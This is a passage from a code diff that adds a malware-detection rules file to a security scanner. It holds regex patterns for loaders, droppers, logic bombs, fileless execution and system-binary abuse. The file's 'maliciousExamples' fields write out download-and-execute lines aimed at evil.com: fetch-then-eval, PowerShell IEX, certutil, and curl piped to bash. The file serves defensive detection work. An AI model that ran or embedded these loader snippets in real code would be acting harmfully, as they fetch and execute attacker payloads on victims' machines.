  487. package/src/analyzers/javascript/taintAnalyzer.ts +630 -0
  488. package/src/analyzers/php/index.ts +5 -0
  489. package/src/analyzers/php/phpAnalyzer.ts +280 -0
  490. package/src/analyzers/python/index.ts +5 -0
  491. package/src/analyzers/python/pythonAnalyzer.ts +319 -0
  492. package/src/cli/index.ts +276 -0
  493. package/src/dependencies/aiDependencyAnalyzer.ts +496 -0
  494. package/src/dependencies/database/cveDatabase.ts +426 -0
  495. package/src/dependencies/database/index.ts +6 -0
  496. package/src/dependencies/database/maliciousPackages.ts +286 -0
  497. package/src/dependencies/dependencyAnalyzer.ts +394 -0
  498. package/src/dependencies/detectors/index.ts +7 -0
  499. package/src/dependencies/detectors/securityStandards.ts +200 -0
  500. package/src/dependencies/detectors/vulnerabilityDetector.ts +343 -0
  501. package/src/dependencies/index.ts +27 -0
  502. package/src/dependencies/installed/index.ts +8 -0
  503. package/src/dependencies/installed/installedScanner.ts +821 -0
  504. package/src/dependencies/installed/malwarePatterns.ts +492 -0
  505. package/src/dependencies/installed/types.ts +287 -0
  506. package/src/dependencies/parsers/base/baseParser.ts +108 -0
  507. package/src/dependencies/parsers/base/index.ts +6 -0
  508. package/src/dependencies/parsers/cpp/cppParser.ts +245 -0
  509. package/src/dependencies/parsers/cpp/index.ts +6 -0
  510. package/src/dependencies/parsers/csharp/csharpParser.ts +151 -0
  511. package/src/dependencies/parsers/csharp/index.ts +6 -0
  512. package/src/dependencies/parsers/index.ts +56 -0
  513. package/src/dependencies/parsers/java/index.ts +6 -0
  514. package/src/dependencies/parsers/java/javaParser.ts +203 -0
  515. package/src/dependencies/parsers/javascript/index.ts +6 -0
  516. package/src/dependencies/parsers/javascript/javascriptParser.ts +362 -0
  517. package/src/dependencies/parsers/php/index.ts +6 -0
  518. package/src/dependencies/parsers/php/phpParser.ts +208 -0
  519. package/src/dependencies/parsers/python/index.ts +6 -0
  520. package/src/dependencies/parsers/python/pythonParser.ts +437 -0
  521. package/src/dependencies/types.ts +330 -0
  522. package/src/i18n/index.ts +1 -0
  523. package/src/i18n/translations.ts +194 -0
  524. package/src/index.ts +16 -0
  525. package/src/reports/dependencyReportGenerator.ts +717 -0
  526. package/src/reports/htmlReportGenerator.ts +781 -0
  527. package/src/reports/index.ts +7 -0
  528. package/src/reports/installedDepsReportGenerator.ts +899 -0
  529. package/src/rules/index.ts +58 -0
  530. package/src/rules/malware/INFO.md +287 -0
  531. package/src/rules/malware/categories/backdoors.ts +174 -0
  532. package/src/rules/malware/categories/cryptominers.ts +434 -0
  533. package/src/rules/malware/categories/exfiltration.ts +677 -0
  534. package/src/rules/malware/categories/keyloggers.ts +780 -0
  535. package/src/rules/malware/categories/loaders.ts +721 -0
  536. package/src/rules/malware/categories/network.ts +639 -0
  537. package/src/rules/malware/categories/obfuscation.ts +788 -0
  538. package/src/rules/malware/constants/index.ts +358 -0
  539. package/src/rules/malware/engine/index.ts +758 -0
  540. package/src/rules/malware/index.ts +928 -0
  541. package/src/rules/malware/scoring/index.ts +549 -0
  542. package/src/rules/malware/types/index.ts +752 -0
  543. package/src/rules/malware/utils/index.ts +643 -0
  544. package/src/rules/standards.ts +372 -0
  545. package/src/rules/vulnerabilities/PROMPT_VULNERABILITIES.md +226 -0
  546. package/src/rules/vulnerabilities/constants/index.ts +625 -0
  547. package/src/rules/vulnerabilities/engine/index.ts +831 -0
  548. package/src/rules/vulnerabilities/index.ts +312 -0
  549. package/src/rules/vulnerabilities/rules/authentication.ts +426 -0
  550. package/src/rules/vulnerabilities/rules/commandInjection.ts +307 -0
  551. package/src/rules/vulnerabilities/rules/csrf.ts +268 -0
  552. package/src/rules/vulnerabilities/rules/deserialization.ts +343 -0
  553. package/src/rules/vulnerabilities/rules/fileUpload.ts +332 -0
  554. package/src/rules/vulnerabilities/rules/hardcodedSecrets.ts +453 -0
  555. package/src/rules/vulnerabilities/rules/index.ts +17 -0
  556. package/src/rules/vulnerabilities/rules/pathTraversal.ts +358 -0
  557. package/src/rules/vulnerabilities/rules/prototypePollution.ts +279 -0
  558. package/src/rules/vulnerabilities/rules/securityMisconfiguration.ts +445 -0
  559. package/src/rules/vulnerabilities/rules/sqlInjection.ts +669 -0
  560. package/src/rules/vulnerabilities/rules/ssrf.ts +408 -0
  561. package/src/rules/vulnerabilities/rules/xss.ts +753 -0
  562. package/src/rules/vulnerabilities/scoring/index.ts +543 -0
  563. package/src/rules/vulnerabilities/types/index.ts +1004 -0
  564. package/src/rules/vulnerabilities/utils/index.ts +709 -0
  565. package/src/types/index.ts +391 -0
  566. package/src/utils/index.ts +306 -0
  567. package/src/utils/logger.ts +150 -0
  568. package/test-installed-scanner.ts +136 -0
  569. package/tsconfig.json +30 -0
@@ -0,0 +1,721 @@
1
+ /**
2
+ * @fileoverview Loader, Dropper, and Multi-Stage Malware Detection Rules
3
+ * @module rules/malware/categories/loaders
4
+ *
5
+ * Comprehensive rules for detecting malware loaders and droppers including:
6
+ * - Remote code loading
7
+ * - Dynamic script injection
8
+ * - Multi-stage malware
9
+ * - Fileless malware patterns
10
+ * - Living-off-the-land techniques
11
+ */
12
+
13
+ import {
14
+ MalwareRule,
15
+ MalwareThreatType,
16
+ MalwareCategory,
17
+ MalwareSeverity,
18
+ ConfidenceLevel,
19
+ SupportedLanguage,
20
+ PatternType,
21
+ MitreTactic
22
+ } from '../types';
23
+
24
+ // ============================================================================
25
+ // REMOTE CODE LOADER RULES
26
+ // ============================================================================
27
+
28
+ export const remoteLoaderRules: MalwareRule[] = [
29
+ {
30
+ id: 'MAL-LOAD-001',
31
+ name: 'Malicious Loader - Remote Script Execution',
32
+ description: 'Detects patterns that fetch and execute remote code dynamically.',
33
+ version: '2.0.0',
34
+ threatType: MalwareThreatType.LOADER,
35
+ category: MalwareCategory.DROPPER,
36
+ languages: [
37
+ SupportedLanguage.JAVASCRIPT,
38
+ SupportedLanguage.TYPESCRIPT,
39
+ SupportedLanguage.PYTHON,
40
+ SupportedLanguage.PHP
41
+ ],
42
+ severity: MalwareSeverity.CRITICAL,
43
+ confidence: ConfidenceLevel.HIGH,
44
+ baseScore: 90,
45
+ patterns: [
46
+ {
47
+ type: PatternType.REGEX,
48
+ patternId: 'eval-fetch',
49
+ pattern: 'eval\\s*\\([^)]*(?:fetch|axios|request|\\$\\.get)\\s*\\(',
50
+ flags: 'gis',
51
+ weight: 1.0,
52
+ description: 'Eval with remote fetch'
53
+ },
54
+ {
55
+ type: PatternType.REGEX,
56
+ patternId: 'function-constructor-fetch',
57
+ pattern: 'Function\\s*\\([^)]*\\)[\\s\\S]*?(?:fetch|XMLHttpRequest|http\\.get)',
58
+ flags: 'gis',
59
+ weight: 1.0,
60
+ description: 'Function constructor with remote data'
61
+ },
62
+ {
63
+ type: PatternType.REGEX,
64
+ patternId: 'python-exec-urllib',
65
+ pattern: 'exec\\s*\\(\\s*(?:urllib|requests)\\.(?:urlopen|get)\\s*\\([^)]+\\)\\.read\\s*\\(',
66
+ flags: 'gis',
67
+ weight: 1.0,
68
+ description: 'Python exec with URL fetch'
69
+ },
70
+ {
71
+ type: PatternType.REGEX,
72
+ patternId: 'php-include-http',
73
+ pattern: '(?:include|require)(?:_once)?\\s*\\([^)]*https?:',
74
+ flags: 'gi',
75
+ weight: 1.0,
76
+ description: 'PHP remote file inclusion'
77
+ },
78
+ {
79
+ type: PatternType.REGEX,
80
+ patternId: 'node-vm-remote',
81
+ pattern: 'vm\\.(?:runInThisContext|runInNewContext)\\s*\\([^)]*(?:fetch|http\\.get|axios)',
82
+ flags: 'gis',
83
+ weight: 1.0,
84
+ description: 'Node.js VM with remote code'
85
+ }
86
+ ],
87
+ amplifyingPatterns: [
88
+ {
89
+ type: PatternType.REGEX,
90
+ patternId: 'external-url',
91
+ pattern: 'https?:\\/\\/(?!localhost|127\\.0\\.0\\.1)[\\w.-]+',
92
+ flags: 'gi',
93
+ weight: 0.4,
94
+ description: 'External URL present'
95
+ }
96
+ ],
97
+ maliciousExamples: [
98
+ {
99
+ code: `fetch('https://evil.com/payload.js')
100
+ .then(r => r.text())
101
+ .then(code => eval(code));`,
102
+ language: SupportedLanguage.JAVASCRIPT,
103
+ isMalicious: true,
104
+ description: 'Remote code loader via fetch'
105
+ },
106
+ {
107
+ code: `import urllib.request
108
+ exec(urllib.request.urlopen('http://evil.com/backdoor.py').read())`,
109
+ language: SupportedLanguage.PYTHON,
110
+ isMalicious: true,
111
+ description: 'Python remote code execution'
112
+ }
113
+ ],
114
+ impact: {
115
+ technical: 'Dynamically loads and executes code from remote source.',
116
+ business: 'Allows attacker to update malware without modifying files.',
117
+ affectedAssets: ['Application runtime', 'System'],
118
+ dataAtRisk: ['All accessible data', 'System control']
119
+ },
120
+ remediation: {
121
+ summary: 'Remove remote code loading and implement Content Security Policy.',
122
+ steps: [
123
+ 'Remove all dynamic remote code loading',
124
+ 'Implement strict Content Security Policy',
125
+ 'Use Subresource Integrity for external scripts',
126
+ 'Whitelist allowed script sources',
127
+ 'Monitor network connections for unusual patterns'
128
+ ]
129
+ },
130
+ mitreAttack: [
131
+ {
132
+ tacticId: MitreTactic.EXECUTION,
133
+ tacticName: 'Execution',
134
+ techniqueId: 'T1059',
135
+ techniqueName: 'Command and Scripting Interpreter',
136
+ url: 'https://attack.mitre.org/techniques/T1059/'
137
+ },
138
+ {
139
+ tacticId: MitreTactic.COMMAND_AND_CONTROL,
140
+ tacticName: 'Command and Control',
141
+ techniqueId: 'T1105',
142
+ techniqueName: 'Ingress Tool Transfer',
143
+ url: 'https://attack.mitre.org/techniques/T1105/'
144
+ }
145
+ ],
146
+ tags: ['loader', 'remote-code', 'dynamic-execution', 'critical'],
147
+ enabled: true
148
+ },
149
+ {
150
+ id: 'MAL-LOAD-002',
151
+ name: 'Malicious Loader - Dynamic Script Injection',
152
+ description: 'Detects dynamic injection of script tags or script elements.',
153
+ version: '2.0.0',
154
+ threatType: MalwareThreatType.LOADER,
155
+ category: MalwareCategory.DROPPER,
156
+ languages: [SupportedLanguage.JAVASCRIPT, SupportedLanguage.TYPESCRIPT],
157
+ severity: MalwareSeverity.HIGH,
158
+ confidence: ConfidenceLevel.HIGH,
159
+ baseScore: 78,
160
+ patterns: [
161
+ {
162
+ type: PatternType.REGEX,
163
+ patternId: 'document-write-script',
164
+ pattern: 'document\\.write\\s*\\([^)]*<script[^>]*src\\s*=',
165
+ flags: 'gis',
166
+ weight: 0.9,
167
+ description: 'document.write with script tag'
168
+ },
169
+ {
170
+ type: PatternType.REGEX,
171
+ patternId: 'createElement-script-src',
172
+ pattern: '\\.createElement\\s*\\([\'"]script[\'"]\\)[\\s\\S]*?\\.src\\s*=\\s*[^;]+;[\\s\\S]*?appendChild',
173
+ flags: 'gis',
174
+ weight: 0.8,
175
+ description: 'Dynamic script element creation'
176
+ },
177
+ {
178
+ type: PatternType.REGEX,
179
+ patternId: 'innerhtml-script',
180
+ pattern: '\\.innerHTML\\s*[+]?=\\s*[\'"][^\'\"]*<script',
181
+ flags: 'gis',
182
+ weight: 0.9,
183
+ description: 'Script injection via innerHTML'
184
+ },
185
+ {
186
+ type: PatternType.REGEX,
187
+ patternId: 'script-text-eval',
188
+ pattern: 'createElement\\s*\\([\'"]script[\'"]\\)[\\s\\S]*?\\.(?:text|textContent)\\s*=\\s*[^;]+;[\\s\\S]*?appendChild',
189
+ flags: 'gis',
190
+ weight: 0.8,
191
+ description: 'Inline script injection'
192
+ }
193
+ ],
194
+ maliciousExamples: [
195
+ {
196
+ code: `const script = document.createElement('script');
197
+ script.src = 'https://evil.com/malware.js';
198
+ document.body.appendChild(script);`,
199
+ language: SupportedLanguage.JAVASCRIPT,
200
+ isMalicious: true,
201
+ description: 'Dynamic malicious script injection'
202
+ }
203
+ ],
204
+ falsePositivePatterns: [
205
+ {
206
+ type: PatternType.REGEX,
207
+ patternId: 'analytics-known',
208
+ pattern: 'google-analytics|googletagmanager|segment\\.com',
209
+ flags: 'gi',
210
+ weight: 0.4,
211
+ description: 'Known analytics services'
212
+ }
213
+ ],
214
+ impact: {
215
+ technical: 'Dynamically injects executable scripts into the page.',
216
+ business: 'Code injection allowing arbitrary script execution.',
217
+ affectedAssets: ['Web page', 'User browser'],
218
+ dataAtRisk: ['Page data', 'User session']
219
+ },
220
+ remediation: {
221
+ summary: 'Remove dynamic script injection and use CSP.',
222
+ steps: [
223
+ 'Remove unauthorized script injection code',
224
+ 'Implement Content Security Policy',
225
+ 'Use nonce or hash-based CSP for inline scripts',
226
+ 'Audit all script loading mechanisms'
227
+ ]
228
+ },
229
+ tags: ['loader', 'script-injection', 'dom-manipulation', 'high'],
230
+ enabled: true
231
+ }
232
+ ];
233
+
234
+ // ============================================================================
235
+ // DROPPER RULES
236
+ // ============================================================================
237
+
238
+ export const dropperRules: MalwareRule[] = [
239
+ {
240
+ id: 'MAL-LOAD-010',
241
+ name: 'Dropper - File Write with Download',
242
+ description: 'Detects patterns that download and write executable files.',
243
+ version: '2.0.0',
244
+ threatType: MalwareThreatType.DROPPER,
245
+ category: MalwareCategory.DROPPER,
246
+ languages: [SupportedLanguage.PYTHON, SupportedLanguage.JAVASCRIPT, SupportedLanguage.TYPESCRIPT],
247
+ severity: MalwareSeverity.CRITICAL,
248
+ confidence: ConfidenceLevel.HIGH,
249
+ baseScore: 88,
250
+ patterns: [
251
+ {
252
+ type: PatternType.REGEX,
253
+ patternId: 'python-download-write',
254
+ pattern: '(?:urllib|requests)\\.(?:urlopen|get)[\\s\\S]*?open\\s*\\([^)]+[\'"][wb][\'"]\\)[\\s\\S]*?\\.write',
255
+ flags: 'gis',
256
+ weight: 1.0,
257
+ description: 'Python download and file write'
258
+ },
259
+ {
260
+ type: PatternType.REGEX,
261
+ patternId: 'node-download-fs',
262
+ pattern: '(?:fetch|http\\.get|axios)[\\s\\S]*?fs\\.(?:writeFile|createWriteStream)',
263
+ flags: 'gis',
264
+ weight: 1.0,
265
+ description: 'Node.js download and file write'
266
+ },
267
+ {
268
+ type: PatternType.REGEX,
269
+ patternId: 'executable-extension',
270
+ pattern: '\\.(?:exe|dll|so|dylib|sh|bat|cmd|ps1|vbs)[\'"]',
271
+ flags: 'gi',
272
+ weight: 0.5,
273
+ description: 'Executable file extension'
274
+ }
275
+ ],
276
+ amplifyingPatterns: [
277
+ {
278
+ type: PatternType.REGEX,
279
+ patternId: 'chmod-executable',
280
+ pattern: 'chmod\\s+[+]?x|os\\.chmod\\s*\\([^)]+0o7[0-7]{2}',
281
+ flags: 'gi',
282
+ weight: 0.6,
283
+ description: 'Making file executable'
284
+ },
285
+ {
286
+ type: PatternType.REGEX,
287
+ patternId: 'subprocess-run',
288
+ pattern: 'subprocess\\.(?:run|Popen|call)|exec\\s*\\(',
289
+ flags: 'gi',
290
+ weight: 0.5,
291
+ description: 'Process execution'
292
+ }
293
+ ],
294
+ maliciousExamples: [
295
+ {
296
+ code: `import urllib.request
297
+ import subprocess
298
+ urllib.request.urlretrieve('http://evil.com/backdoor.exe', '/tmp/backdoor.exe')
299
+ subprocess.run(['/tmp/backdoor.exe'])`,
300
+ language: SupportedLanguage.PYTHON,
301
+ isMalicious: true,
302
+ description: 'Download and execute dropper'
303
+ }
304
+ ],
305
+ impact: {
306
+ technical: 'Downloads and writes executable files to disk.',
307
+ business: 'Stage 1 of multi-stage malware infection.',
308
+ affectedAssets: ['File system', 'System processes'],
309
+ dataAtRisk: ['System integrity', 'All accessible data']
310
+ },
311
+ remediation: {
312
+ summary: 'Remove dropper code and scan for downloaded payloads.',
313
+ steps: [
314
+ 'Remove the dropper code',
315
+ 'Scan file system for downloaded payloads',
316
+ 'Check for executed processes',
317
+ 'Investigate network connections',
318
+ 'Reset credentials if compromised'
319
+ ]
320
+ },
321
+ mitreAttack: [
322
+ {
323
+ tacticId: MitreTactic.EXECUTION,
324
+ tacticName: 'Execution',
325
+ techniqueId: 'T1204',
326
+ techniqueName: 'User Execution',
327
+ url: 'https://attack.mitre.org/techniques/T1204/'
328
+ },
329
+ {
330
+ tacticId: MitreTactic.COMMAND_AND_CONTROL,
331
+ tacticName: 'Command and Control',
332
+ techniqueId: 'T1105',
333
+ techniqueName: 'Ingress Tool Transfer',
334
+ url: 'https://attack.mitre.org/techniques/T1105/'
335
+ }
336
+ ],
337
+ tags: ['dropper', 'download', 'file-write', 'critical'],
338
+ enabled: true
339
+ }
340
+ ];
341
+
342
+ // ============================================================================
343
+ // MULTI-STAGE MALWARE RULES
344
+ // ============================================================================
345
+
346
+ export const multiStageRules: MalwareRule[] = [
347
+ {
348
+ id: 'MAL-LOAD-020',
349
+ name: 'Multi-Stage - Delayed Execution',
350
+ description: 'Detects time-delayed or condition-based malware activation.',
351
+ version: '2.0.0',
352
+ threatType: MalwareThreatType.MULTI_STAGE,
353
+ category: MalwareCategory.DROPPER,
354
+ languages: [
355
+ SupportedLanguage.JAVASCRIPT,
356
+ SupportedLanguage.TYPESCRIPT,
357
+ SupportedLanguage.PYTHON
358
+ ],
359
+ severity: MalwareSeverity.HIGH,
360
+ confidence: ConfidenceLevel.MEDIUM,
361
+ baseScore: 72,
362
+ patterns: [
363
+ {
364
+ type: PatternType.REGEX,
365
+ patternId: 'setTimeout-fetch-eval',
366
+ pattern: 'setTimeout\\s*\\([^)]*(?:fetch|http)[\\s\\S]*?(?:eval|Function|exec)',
367
+ flags: 'gis',
368
+ weight: 0.9,
369
+ description: 'Delayed remote code execution'
370
+ },
371
+ {
372
+ type: PatternType.REGEX,
373
+ patternId: 'date-check-execution',
374
+ pattern: 'new\\s+Date\\s*\\([^)]*\\)[\\s\\S]{0,100}(?:getTime|getDate|getMonth)[\\s\\S]{0,100}(?:eval|exec|Function)',
375
+ flags: 'gis',
376
+ weight: 0.8,
377
+ description: 'Date-based activation'
378
+ },
379
+ {
380
+ type: PatternType.REGEX,
381
+ patternId: 'counter-trigger',
382
+ pattern: '(?:var|let|const)\\s+\\w+\\s*=\\s*0[\\s\\S]*?\\+\\+[\\s\\S]{0,100}(?:eval|exec)',
383
+ flags: 'gis',
384
+ weight: 0.6,
385
+ description: 'Counter-based trigger'
386
+ }
387
+ ],
388
+ maliciousExamples: [
389
+ {
390
+ code: `let visitCount = parseInt(localStorage.getItem('visits') || '0');
391
+ visitCount++;
392
+ localStorage.setItem('visits', visitCount.toString());
393
+ if (visitCount >= 5) {
394
+ fetch('https://evil.com/stage2.js').then(r => r.text()).then(eval);
395
+ }`,
396
+ language: SupportedLanguage.JAVASCRIPT,
397
+ isMalicious: true,
398
+ description: 'Visit counter-triggered payload'
399
+ }
400
+ ],
401
+ impact: {
402
+ technical: 'Activates malicious payload after delay or condition.',
403
+ business: 'Evades detection through delayed activation.',
404
+ affectedAssets: ['Application runtime'],
405
+ dataAtRisk: ['Depends on stage 2 payload']
406
+ },
407
+ remediation: {
408
+ summary: 'Remove delayed execution logic and analyze all stages.',
409
+ steps: [
410
+ 'Remove timing or condition-based triggers',
411
+ 'Analyze all referenced payloads',
412
+ 'Check for persistence mechanisms'
413
+ ]
414
+ },
415
+ mitreAttack: [
416
+ {
417
+ tacticId: MitreTactic.DEFENSE_EVASION,
418
+ tacticName: 'Defense Evasion',
419
+ techniqueId: 'T1027',
420
+ techniqueName: 'Obfuscated Files or Information',
421
+ url: 'https://attack.mitre.org/techniques/T1027/'
422
+ }
423
+ ],
424
+ tags: ['multi-stage', 'delayed-execution', 'time-bomb', 'high'],
425
+ enabled: true
426
+ },
427
+ {
428
+ id: 'MAL-LOAD-021',
429
+ name: 'Multi-Stage - Environment-Based Activation',
430
+ description: 'Detects malware that activates based on environment conditions.',
431
+ version: '2.0.0',
432
+ threatType: MalwareThreatType.LOGIC_BOMB,
433
+ category: MalwareCategory.DROPPER,
434
+ languages: [
435
+ SupportedLanguage.JAVASCRIPT,
436
+ SupportedLanguage.TYPESCRIPT,
437
+ SupportedLanguage.PYTHON
438
+ ],
439
+ severity: MalwareSeverity.HIGH,
440
+ confidence: ConfidenceLevel.MEDIUM,
441
+ baseScore: 75,
442
+ patterns: [
443
+ {
444
+ type: PatternType.REGEX,
445
+ patternId: 'prod-env-trigger',
446
+ pattern: 'NODE_ENV\\s*===?\\s*[\'"]production[\'"][\\s\\S]*?(?:eval|exec|fetch)',
447
+ flags: 'gis',
448
+ weight: 0.9,
449
+ description: 'Production environment trigger'
450
+ },
451
+ {
452
+ type: PatternType.REGEX,
453
+ patternId: 'domain-check-trigger',
454
+ pattern: 'location\\.(?:hostname|host)[\\s\\S]*?(?:match|includes|===)[\\s\\S]*?(?:eval|exec)',
455
+ flags: 'gis',
456
+ weight: 0.8,
457
+ description: 'Domain-based activation'
458
+ },
459
+ {
460
+ type: PatternType.REGEX,
461
+ patternId: 'ci-env-skip',
462
+ pattern: 'process\\.env\\.(?:CI|TRAVIS|JENKINS|GITHUB_ACTIONS)[\\s\\S]*?(?:return|exit)',
463
+ flags: 'gis',
464
+ weight: 0.7,
465
+ description: 'CI environment skip'
466
+ }
467
+ ],
468
+ maliciousExamples: [
469
+ {
470
+ code: `if (process.env.NODE_ENV === 'production' && !process.env.CI) {
471
+ fetch('https://evil.com/prod-payload.js').then(r => r.text()).then(eval);
472
+ }`,
473
+ language: SupportedLanguage.JAVASCRIPT,
474
+ isMalicious: true,
475
+ description: 'Production-only malware activation'
476
+ }
477
+ ],
478
+ impact: {
479
+ technical: 'Activates only in specific environments to evade testing.',
480
+ business: 'Targets production systems while avoiding detection.',
481
+ affectedAssets: ['Production environment'],
482
+ dataAtRisk: ['Production data']
483
+ },
484
+ remediation: {
485
+ summary: 'Remove environment-based triggers and analyze activation logic.',
486
+ steps: [
487
+ 'Remove environment checks tied to malicious code',
488
+ 'Test in production-like environments',
489
+ 'Implement environment-independent security'
490
+ ]
491
+ },
492
+ tags: ['multi-stage', 'environment-trigger', 'logic-bomb', 'high'],
493
+ enabled: true
494
+ }
495
+ ];
496
+
497
+ // ============================================================================
498
+ // FILELESS MALWARE RULES
499
+ // ============================================================================
500
+
501
+ export const filelessRules: MalwareRule[] = [
502
+ {
503
+ id: 'MAL-LOAD-030',
504
+ name: 'Fileless - Memory-Only Execution',
505
+ description: 'Detects patterns indicative of fileless malware executing only in memory.',
506
+ version: '2.0.0',
507
+ threatType: MalwareThreatType.FILELESS,
508
+ category: MalwareCategory.DROPPER,
509
+ languages: [
510
+ SupportedLanguage.JAVASCRIPT,
511
+ SupportedLanguage.TYPESCRIPT,
512
+ SupportedLanguage.PYTHON,
513
+ SupportedLanguage.POWERSHELL
514
+ ],
515
+ severity: MalwareSeverity.HIGH,
516
+ confidence: ConfidenceLevel.MEDIUM,
517
+ baseScore: 76,
518
+ patterns: [
519
+ {
520
+ type: PatternType.REGEX,
521
+ patternId: 'ps-iex-downloadstring',
522
+ pattern: 'IEX\\s*\\([^)]*DownloadString',
523
+ flags: 'gi',
524
+ weight: 1.0,
525
+ description: 'PowerShell IEX with DownloadString'
526
+ },
527
+ {
528
+ type: PatternType.REGEX,
529
+ patternId: 'ps-memory-load',
530
+ pattern: '\\[System\\.Reflection\\.Assembly\\]::Load\\s*\\([^)]*\\[System\\.Net\\.WebClient\\]',
531
+ flags: 'gi',
532
+ weight: 1.0,
533
+ description: 'PowerShell in-memory assembly load'
534
+ },
535
+ {
536
+ type: PatternType.REGEX,
537
+ patternId: 'js-blob-worker',
538
+ pattern: 'new\\s+Worker\\s*\\(\\s*URL\\.createObjectURL\\s*\\(\\s*new\\s+Blob',
539
+ flags: 'gis',
540
+ weight: 0.8,
541
+ description: 'JavaScript Blob Worker (fileless)'
542
+ },
543
+ {
544
+ type: PatternType.REGEX,
545
+ patternId: 'python-io-exec',
546
+ pattern: 'exec\\s*\\(\\s*io\\.BytesIO\\s*\\(',
547
+ flags: 'gi',
548
+ weight: 0.7,
549
+ description: 'Python in-memory execution'
550
+ }
551
+ ],
552
+ maliciousExamples: [
553
+ {
554
+ code: `IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')`,
555
+ language: SupportedLanguage.POWERSHELL,
556
+ isMalicious: true,
557
+ description: 'PowerShell fileless execution'
558
+ },
559
+ {
560
+ code: `const blob = new Blob([maliciousCode], { type: 'application/javascript' });
561
+ const worker = new Worker(URL.createObjectURL(blob));`,
562
+ language: SupportedLanguage.JAVASCRIPT,
563
+ isMalicious: true,
564
+ description: 'JavaScript fileless Web Worker'
565
+ }
566
+ ],
567
+ impact: {
568
+ technical: 'Executes entirely in memory without writing to disk.',
569
+ business: 'Evades file-based detection mechanisms.',
570
+ affectedAssets: ['System memory', 'Processes'],
571
+ dataAtRisk: ['All accessible data']
572
+ },
573
+ remediation: {
574
+ summary: 'Implement memory-based detection and behavior monitoring.',
575
+ steps: [
576
+ 'Remove fileless execution code',
577
+ 'Implement behavior-based detection',
578
+ 'Monitor process memory for anomalies',
579
+ 'Use endpoint detection and response (EDR) tools'
580
+ ]
581
+ },
582
+ mitreAttack: [
583
+ {
584
+ tacticId: MitreTactic.DEFENSE_EVASION,
585
+ tacticName: 'Defense Evasion',
586
+ techniqueId: 'T1027',
587
+ techniqueName: 'Obfuscated Files or Information',
588
+ url: 'https://attack.mitre.org/techniques/T1027/'
589
+ },
590
+ {
591
+ tacticId: MitreTactic.EXECUTION,
592
+ tacticName: 'Execution',
593
+ techniqueId: 'T1059.001',
594
+ techniqueName: 'PowerShell',
595
+ url: 'https://attack.mitre.org/techniques/T1059/001/'
596
+ }
597
+ ],
598
+ tags: ['fileless', 'memory-execution', 'evasion', 'high'],
599
+ enabled: true
600
+ }
601
+ ];
602
+
603
+ // ============================================================================
604
+ // LIVING OFF THE LAND RULES
605
+ // ============================================================================
606
+
607
+ export const lotlRules: MalwareRule[] = [
608
+ {
609
+ id: 'MAL-LOAD-040',
610
+ name: 'Living Off The Land - System Binary Abuse',
611
+ description: 'Detects abuse of legitimate system binaries for malicious purposes.',
612
+ version: '2.0.0',
613
+ threatType: MalwareThreatType.LIVING_OFF_THE_LAND,
614
+ category: MalwareCategory.DROPPER,
615
+ languages: [
616
+ SupportedLanguage.PYTHON,
617
+ SupportedLanguage.JAVASCRIPT,
618
+ SupportedLanguage.SHELL,
619
+ SupportedLanguage.POWERSHELL
620
+ ],
621
+ severity: MalwareSeverity.HIGH,
622
+ confidence: ConfidenceLevel.MEDIUM,
623
+ baseScore: 70,
624
+ patterns: [
625
+ {
626
+ type: PatternType.REGEX,
627
+ patternId: 'certutil-download',
628
+ pattern: 'certutil\\s+.*-urlcache\\s+.*http',
629
+ flags: 'gi',
630
+ weight: 1.0,
631
+ description: 'CertUtil for file download'
632
+ },
633
+ {
634
+ type: PatternType.REGEX,
635
+ patternId: 'bitsadmin-download',
636
+ pattern: 'bitsadmin\\s+\\/transfer.*http',
637
+ flags: 'gi',
638
+ weight: 1.0,
639
+ description: 'BitsAdmin for file download'
640
+ },
641
+ {
642
+ type: PatternType.REGEX,
643
+ patternId: 'mshta-http',
644
+ pattern: 'mshta\\s+http',
645
+ flags: 'gi',
646
+ weight: 1.0,
647
+ description: 'MSHTA with remote URL'
648
+ },
649
+ {
650
+ type: PatternType.REGEX,
651
+ patternId: 'regsvr32-scrobj',
652
+ pattern: 'regsvr32\\s+.*\\/[uis].*\\.sct',
653
+ flags: 'gi',
654
+ weight: 1.0,
655
+ description: 'Regsvr32 scriptlet execution'
656
+ },
657
+ {
658
+ type: PatternType.REGEX,
659
+ patternId: 'curl-pipe-sh',
660
+ pattern: 'curl\\s+.*\\|\\s*(?:bash|sh|python)',
661
+ flags: 'gi',
662
+ weight: 1.0,
663
+ description: 'Curl pipe to shell'
664
+ }
665
+ ],
666
+ maliciousExamples: [
667
+ {
668
+ code: `certutil -urlcache -split -f http://evil.com/payload.exe c:\\temp\\payload.exe`,
669
+ language: SupportedLanguage.SHELL,
670
+ isMalicious: true,
671
+ description: 'CertUtil download abuse'
672
+ },
673
+ {
674
+ code: `curl https://evil.com/install.sh | bash`,
675
+ language: SupportedLanguage.SHELL,
676
+ isMalicious: true,
677
+ description: 'Curl pipe to bash'
678
+ }
679
+ ],
680
+ impact: {
681
+ technical: 'Abuses legitimate system tools for malicious activities.',
682
+ business: 'Bypasses application whitelisting and detection.',
683
+ affectedAssets: ['System binaries', 'System trust'],
684
+ dataAtRisk: ['System integrity']
685
+ },
686
+ remediation: {
687
+ summary: 'Monitor and restrict abuse of system binaries.',
688
+ steps: [
689
+ 'Remove malicious command invocations',
690
+ 'Implement application whitelisting with argument restrictions',
691
+ 'Monitor usage of LOLBins',
692
+ 'Use command-line auditing'
693
+ ]
694
+ },
695
+ mitreAttack: [
696
+ {
697
+ tacticId: MitreTactic.DEFENSE_EVASION,
698
+ tacticName: 'Defense Evasion',
699
+ techniqueId: 'T1218',
700
+ techniqueName: 'System Binary Proxy Execution',
701
+ url: 'https://attack.mitre.org/techniques/T1218/'
702
+ }
703
+ ],
704
+ tags: ['lotl', 'lolbins', 'system-binary-abuse', 'high'],
705
+ enabled: true
706
+ }
707
+ ];
708
+
709
+ // ============================================================================
710
+ // EXPORT ALL LOADER RULES
711
+ // ============================================================================
712
+
713
+ export const loaderRules: MalwareRule[] = [
714
+ ...remoteLoaderRules,
715
+ ...dropperRules,
716
+ ...multiStageRules,
717
+ ...filelessRules,
718
+ ...lotlRules
719
+ ];
720
+
721
+ export default loaderRules;